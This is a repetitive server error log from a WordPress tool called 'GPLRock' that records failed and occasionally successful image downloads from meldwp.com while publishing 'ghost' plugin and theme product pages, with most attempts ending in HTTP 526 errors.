Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-magnify-wordpress-plugin-2500.webp for product image-magnify-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:20:49 UTC] GPLRock: Image download failed for product image-magnify-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:20:52 UTC] GPLRock: Image download failed for product image-magnify-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:20:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-magnify-wordpress-plugin-2500.webp for product image-magnify-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:20:54 UTC] GPLRock WARNING: Image download failed for product image-magnify-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/image-magnify-wordpress-plugin-2500.webp [04-Apr-2026 22:20:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: image-magnify-wordpress-plugin [04-Apr-2026 22:20:54 UTC] GPLRock: Image download failed for product bwd-count-down-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:20:56 UTC] GPLRock: Image download failed for product bwd-count-down-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:20:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwd-count-down-addon-for-elementor-11825.webp for product bwd-count-down-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:20:58 UTC] GPLRock: Image download failed for product bwd-count-down-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:00 UTC] GPLRock: Image download failed for product bwd-count-down-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bwd-count-down-addon-for-elementor-11825.webp for product bwd-count-down-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:02 UTC] GPLRock WARNING: Image download failed for product bwd-count-down-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/bwd-count-down-addon-for-elementor-11825.webp [04-Apr-2026 22:21:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bwd-count-down-addon-for-elementor [04-Apr-2026 22:21:03 UTC] GPLRock: Image download failed for product youtube-video-mass-poster-and-pinner (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:05 UTC] GPLRock: Image download failed for product youtube-video-mass-poster-and-pinner (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/youtube-video-mass-poster-and-pinner-29486.webp for product youtube-video-mass-poster-and-pinner after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:07 UTC] GPLRock: Image download failed for product youtube-video-mass-poster-and-pinner (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:10 UTC] GPLRock: Image download failed for product youtube-video-mass-poster-and-pinner (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/youtube-video-mass-poster-and-pinner-29486.webp for product youtube-video-mass-poster-and-pinner after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:12 UTC] GPLRock WARNING: Image download failed for product youtube-video-mass-poster-and-pinner. URL: https://meldwp.com/wp-content/uploads/youtube-video-mass-poster-and-pinner-29486.webp [04-Apr-2026 22:21:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: youtube-video-mass-poster-and-pinner [04-Apr-2026 22:21:12 UTC] GPLRock: Image download failed for product woocommerce-print-products-pdf (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:14 UTC] GPLRock: Image download failed for product woocommerce-print-products-pdf (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-print-products-pdf-6096.webp for product woocommerce-print-products-pdf after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:16 UTC] GPLRock: Image download failed for product woocommerce-print-products-pdf (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:18 UTC] GPLRock: Image download failed for product woocommerce-print-products-pdf (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-print-products-pdf-6096.webp for product woocommerce-print-products-pdf after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:20 UTC] GPLRock WARNING: Image download failed for product woocommerce-print-products-pdf. URL: https://meldwp.com/wp-content/uploads/woocommerce-print-products-pdf-6096.webp [04-Apr-2026 22:21:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-print-products-pdf [04-Apr-2026 22:21:21 UTC] GPLRock: Image download failed for product elementor-ultimate-magic-popup (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:23 UTC] GPLRock: Image download failed for product elementor-ultimate-magic-popup (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor---ultimate-magic-popup-6008.webp for product elementor-ultimate-magic-popup after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:25 UTC] GPLRock: Image download failed for product elementor-ultimate-magic-popup (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:27 UTC] GPLRock: Image download failed for product elementor-ultimate-magic-popup (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor---ultimate-magic-popup-6008.webp for product elementor-ultimate-magic-popup after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:29 UTC] GPLRock WARNING: Image download failed for product elementor-ultimate-magic-popup. URL: https://meldwp.com/wp-content/uploads/elementor---ultimate-magic-popup-6008.webp [04-Apr-2026 22:21:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elementor-ultimate-magic-popup [04-Apr-2026 22:21:29 UTC] GPLRock: Image download failed for product wpcs-wordpress-currency-switcher-professional-multi-currency (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:31 UTC] GPLRock: Image download failed for product wpcs-wordpress-currency-switcher-professional-multi-currency (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpcs---wordpress-currency-switcher-professional---multi-currency-12199.webp for product wpcs-wordpress-currency-switcher-professional-multi-currency after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:33 UTC] GPLRock: Image download failed for product wpcs-wordpress-currency-switcher-professional-multi-currency (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:36 UTC] GPLRock: Image download failed for product wpcs-wordpress-currency-switcher-professional-multi-currency (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpcs---wordpress-currency-switcher-professional---multi-currency-12199.webp for product wpcs-wordpress-currency-switcher-professional-multi-currency after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:38 UTC] GPLRock WARNING: Image download failed for product wpcs-wordpress-currency-switcher-professional-multi-currency. URL: https://meldwp.com/wp-content/uploads/wpcs---wordpress-currency-switcher-professional---multi-currency-12199.webp [04-Apr-2026 22:21:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpcs-wordpress-currency-switcher-professional-multi-currency [04-Apr-2026 22:21:38 UTC] GPLRock: Image download failed for product portfolio-builder-elementor-portfolio-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:40 UTC] GPLRock: Image download failed for product portfolio-builder-elementor-portfolio-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/portfolio-builder---elementor-portfolio-addon-4238.webp for product portfolio-builder-elementor-portfolio-addon after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:42 UTC] GPLRock: Image download failed for product portfolio-builder-elementor-portfolio-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:44 UTC] GPLRock: Image download failed for product portfolio-builder-elementor-portfolio-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/portfolio-builder---elementor-portfolio-addon-4238.webp for product portfolio-builder-elementor-portfolio-addon after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:46 UTC] GPLRock WARNING: Image download failed for product portfolio-builder-elementor-portfolio-addon. URL: https://meldwp.com/wp-content/uploads/portfolio-builder---elementor-portfolio-addon-4238.webp [04-Apr-2026 22:21:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: portfolio-builder-elementor-portfolio-addon [04-Apr-2026 22:21:47 UTC] GPLRock: Image download failed for product tooltip-elementor-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:49 UTC] GPLRock: Image download failed for product tooltip-elementor-addons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tooltip-elementor-addons-15687.webp for product tooltip-elementor-addons after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:51 UTC] GPLRock: Image download failed for product tooltip-elementor-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:53 UTC] GPLRock: Image download failed for product tooltip-elementor-addons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tooltip-elementor-addons-15687.webp for product tooltip-elementor-addons after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:21:55 UTC] GPLRock WARNING: Image download failed for product tooltip-elementor-addons. URL: https://meldwp.com/wp-content/uploads/tooltip-elementor-addons-15687.webp [04-Apr-2026 22:21:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tooltip-elementor-addons [04-Apr-2026 22:21:55 UTC] GPLRock: Image downloaded successfully for product wpbakery-page-builder-extensions-popup-and-notification (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f068fdf1.webp [04-Apr-2026 22:21:55 UTC] GPLRock: Using pre-downloaded image for product wpbakery-page-builder-extensions-popup-and-notification: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f068fdf1.webp [04-Apr-2026 22:21:55 UTC] GPLRock: Ghost product published with image - Product ID: wpbakery-page-builder-extensions-popup-and-notification [04-Apr-2026 22:21:55 UTC] GPLRock: Image download failed for product darkr-wordpress-admin-light-dark-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:21:57 UTC] GPLRock: Image download failed for product darkr-wordpress-admin-light-dark-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:22:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/darkr---wordpress-admin-light--dark-theme-11537.webp for product darkr-wordpress-admin-light-dark-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:22:00 UTC] GPLRock: Image download failed for product darkr-wordpress-admin-light-dark-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:22:02 UTC] GPLRock: Image download failed for product darkr-wordpress-admin-light-dark-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:22:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/darkr---wordpress-admin-light--dark-theme-11537.webp for product darkr-wordpress-admin-light-dark-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:22:04 UTC] GPLRock WARNING: Image download failed for product darkr-wordpress-admin-light-dark-theme. URL: https://meldwp.com/wp-content/uploads/darkr---wordpress-admin-light--dark-theme-11537.webp [04-Apr-2026 22:22:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: darkr-wordpress-admin-light-dark-theme [04-Apr-2026 22:22:43 UTC] GPLRock: Image download failed for product moose-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:22:46 UTC] GPLRock: Image download failed for product moose-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:22:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moose---creative-multipurpose-wordpress-theme-26042.webp for product moose-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:22:48 UTC] GPLRock: Image download failed for product moose-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:22:50 UTC] GPLRock: Image download failed for product moose-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:22:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moose---creative-multipurpose-wordpress-theme-26042.webp for product moose-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:22:52 UTC] GPLRock WARNING: Image download failed for product moose-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/moose---creative-multipurpose-wordpress-theme-26042.webp [04-Apr-2026 22:22:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: moose-creative-multipurpose-wordpress-theme [04-Apr-2026 22:22:52 UTC] GPLRock: Image download failed for product politicalwp-political-campaign-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:22:54 UTC] GPLRock: Image download failed for product politicalwp-political-campaign-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:22:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/politicalwp---political-campaign-wordpress-theme-10947.webp for product politicalwp-political-campaign-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:22:56 UTC] GPLRock: Image download failed for product politicalwp-political-campaign-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:22:58 UTC] GPLRock: Image download failed for product politicalwp-political-campaign-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/politicalwp---political-campaign-wordpress-theme-10947.webp for product politicalwp-political-campaign-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:23:00 UTC] GPLRock WARNING: Image download failed for product politicalwp-political-campaign-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/politicalwp---political-campaign-wordpress-theme-10947.webp [04-Apr-2026 22:23:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: politicalwp-political-campaign-wordpress-theme [04-Apr-2026 22:23:01 UTC] GPLRock: Image download failed for product oktilcal-eye-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:03 UTC] GPLRock: Image download failed for product oktilcal-eye-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oktilcal---eye-care-wordpress-theme-30499.webp for product oktilcal-eye-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:23:05 UTC] GPLRock: Image download failed for product oktilcal-eye-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:07 UTC] GPLRock: Image download failed for product oktilcal-eye-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oktilcal---eye-care-wordpress-theme-30499.webp for product oktilcal-eye-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:23:09 UTC] GPLRock WARNING: Image download failed for product oktilcal-eye-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oktilcal---eye-care-wordpress-theme-30499.webp [04-Apr-2026 22:23:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oktilcal-eye-care-wordpress-theme [04-Apr-2026 22:23:09 UTC] GPLRock: Image download failed for product prodent-dental-clinic-doctor-wordpress-theme-elementor-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:11 UTC] GPLRock: Image download failed for product prodent-dental-clinic-doctor-wordpress-theme-elementor-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prodent--dental-clinic--doctor-wordpress-theme--elementor--rtl-29650.webp for product prodent-dental-clinic-doctor-wordpress-theme-elementor-rtl after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:23:14 UTC] GPLRock: Image download failed for product prodent-dental-clinic-doctor-wordpress-theme-elementor-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:16 UTC] GPLRock: Image download failed for product prodent-dental-clinic-doctor-wordpress-theme-elementor-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prodent--dental-clinic--doctor-wordpress-theme--elementor--rtl-29650.webp for product prodent-dental-clinic-doctor-wordpress-theme-elementor-rtl after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:23:18 UTC] GPLRock WARNING: Image download failed for product prodent-dental-clinic-doctor-wordpress-theme-elementor-rtl. URL: https://meldwp.com/wp-content/uploads/prodent--dental-clinic--doctor-wordpress-theme--elementor--rtl-29650.webp [04-Apr-2026 22:23:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: prodent-dental-clinic-doctor-wordpress-theme-elementor-rtl [04-Apr-2026 22:23:18 UTC] GPLRock: Image downloaded successfully for product grnn-landscaping-gardening-and-flowers-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-360d6d40.webp [04-Apr-2026 22:23:18 UTC] GPLRock: Using pre-downloaded image for product grnn-landscaping-gardening-and-flowers-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-360d6d40.webp [04-Apr-2026 22:23:18 UTC] GPLRock: Ghost product published with image - Product ID: grnn-landscaping-gardening-and-flowers-wordpress-theme [04-Apr-2026 22:23:18 UTC] GPLRock: Image downloaded successfully for product chardonnay-wine-store-vineyard-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-329d4bbb.webp [04-Apr-2026 22:23:18 UTC] GPLRock: Using pre-downloaded image for product chardonnay-wine-store-vineyard-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-329d4bbb.webp [04-Apr-2026 22:23:18 UTC] GPLRock: Ghost product published with image - Product ID: chardonnay-wine-store-vineyard-wordpress-theme [04-Apr-2026 22:23:18 UTC] GPLRock: Image download failed for product handy-shop-digital-rtl-responsive-woocomerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:20 UTC] GPLRock: Image download failed for product handy-shop-digital-rtl-responsive-woocomerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/handy-shop---digital-rtl-responsive-woocomerce-wordpress-theme-30649.webp for product handy-shop-digital-rtl-responsive-woocomerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:23:23 UTC] GPLRock: Image download failed for product handy-shop-digital-rtl-responsive-woocomerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:25 UTC] GPLRock: Image download failed for product handy-shop-digital-rtl-responsive-woocomerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/handy-shop---digital-rtl-responsive-woocomerce-wordpress-theme-30649.webp for product handy-shop-digital-rtl-responsive-woocomerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:23:27 UTC] GPLRock WARNING: Image download failed for product handy-shop-digital-rtl-responsive-woocomerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/handy-shop---digital-rtl-responsive-woocomerce-wordpress-theme-30649.webp [04-Apr-2026 22:23:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: handy-shop-digital-rtl-responsive-woocomerce-wordpress-theme [04-Apr-2026 22:23:27 UTC] GPLRock: Image download failed for product the-way-creative-onepage-multipurpose-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:29 UTC] GPLRock: Image download failed for product the-way-creative-onepage-multipurpose-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-way---creative-onepage--multipurpose-wordpress-30951.webp for product the-way-creative-onepage-multipurpose-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:23:31 UTC] GPLRock: Image download failed for product the-way-creative-onepage-multipurpose-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:33 UTC] GPLRock: Image download failed for product the-way-creative-onepage-multipurpose-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-way---creative-onepage--multipurpose-wordpress-30951.webp for product the-way-creative-onepage-multipurpose-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:23:35 UTC] GPLRock WARNING: Image download failed for product the-way-creative-onepage-multipurpose-wordpress. URL: https://meldwp.com/wp-content/uploads/the-way---creative-onepage--multipurpose-wordpress-30951.webp [04-Apr-2026 22:23:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-way-creative-onepage-multipurpose-wordpress [04-Apr-2026 22:23:36 UTC] GPLRock: Image downloaded successfully for product attitude-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb93dea8.webp [04-Apr-2026 22:23:36 UTC] GPLRock: Using pre-downloaded image for product attitude-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb93dea8.webp [04-Apr-2026 22:23:36 UTC] GPLRock: Ghost product published with image - Product ID: attitude-multi-purpose-wordpress-theme [04-Apr-2026 22:23:36 UTC] GPLRock: Image download failed for product quanzo-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:38 UTC] GPLRock: Image download failed for product quanzo-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quanzo---portfolio-wordpress-theme-25077.webp for product quanzo-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:23:40 UTC] GPLRock: Image download failed for product quanzo-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:42 UTC] GPLRock: Image download failed for product quanzo-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:23:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quanzo---portfolio-wordpress-theme-25077.webp for product quanzo-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:23:44 UTC] GPLRock WARNING: Image download failed for product quanzo-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/quanzo---portfolio-wordpress-theme-25077.webp [04-Apr-2026 22:23:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quanzo-portfolio-wordpress-theme [04-Apr-2026 22:24:43 UTC] GPLRock: Image download failed for product changelog-custom-list-for-elementor-logger (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:24:45 UTC] GPLRock: Image download failed for product changelog-custom-list-for-elementor-logger (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:24:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/changelog--custom-list-for-elementor--logger-17332.webp for product changelog-custom-list-for-elementor-logger after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:24:47 UTC] GPLRock: Image download failed for product changelog-custom-list-for-elementor-logger (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:24:49 UTC] GPLRock: Image download failed for product changelog-custom-list-for-elementor-logger (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:24:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/changelog--custom-list-for-elementor--logger-17332.webp for product changelog-custom-list-for-elementor-logger after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:24:52 UTC] GPLRock WARNING: Image download failed for product changelog-custom-list-for-elementor-logger. URL: https://meldwp.com/wp-content/uploads/changelog--custom-list-for-elementor--logger-17332.webp [04-Apr-2026 22:24:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: changelog-custom-list-for-elementor-logger [04-Apr-2026 22:24:52 UTC] GPLRock: Image download failed for product essential-hover-effects (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:24:54 UTC] GPLRock: Image download failed for product essential-hover-effects (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:24:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/essential-hover-effects-31227.webp for product essential-hover-effects after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:24:56 UTC] GPLRock: Image download failed for product essential-hover-effects (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:24:58 UTC] GPLRock: Image download failed for product essential-hover-effects (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/essential-hover-effects-31227.webp for product essential-hover-effects after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:00 UTC] GPLRock WARNING: Image download failed for product essential-hover-effects. URL: https://meldwp.com/wp-content/uploads/essential-hover-effects-31227.webp [04-Apr-2026 22:25:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: essential-hover-effects [04-Apr-2026 22:25:00 UTC] GPLRock: Image download failed for product post-list-smart-post-list-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:02 UTC] GPLRock: Image download failed for product post-list-smart-post-list-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-list---smart-post-list-addon-for-elementor-33083.webp for product post-list-smart-post-list-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:05 UTC] GPLRock: Image download failed for product post-list-smart-post-list-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:07 UTC] GPLRock: Image download failed for product post-list-smart-post-list-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-list---smart-post-list-addon-for-elementor-33083.webp for product post-list-smart-post-list-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:25:09 UTC] GPLRock WARNING: Image download failed for product post-list-smart-post-list-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/post-list---smart-post-list-addon-for-elementor-33083.webp [04-Apr-2026 22:25:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: post-list-smart-post-list-addon-for-elementor [04-Apr-2026 22:25:09 UTC] GPLRock: Image download failed for product quick-view-of-woocommerce-products (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:11 UTC] GPLRock: Image download failed for product quick-view-of-woocommerce-products (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:25:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-view-of-woocommerce-products-27062.webp for product quick-view-of-woocommerce-products after 3 attempts. HTTP Code: 526, 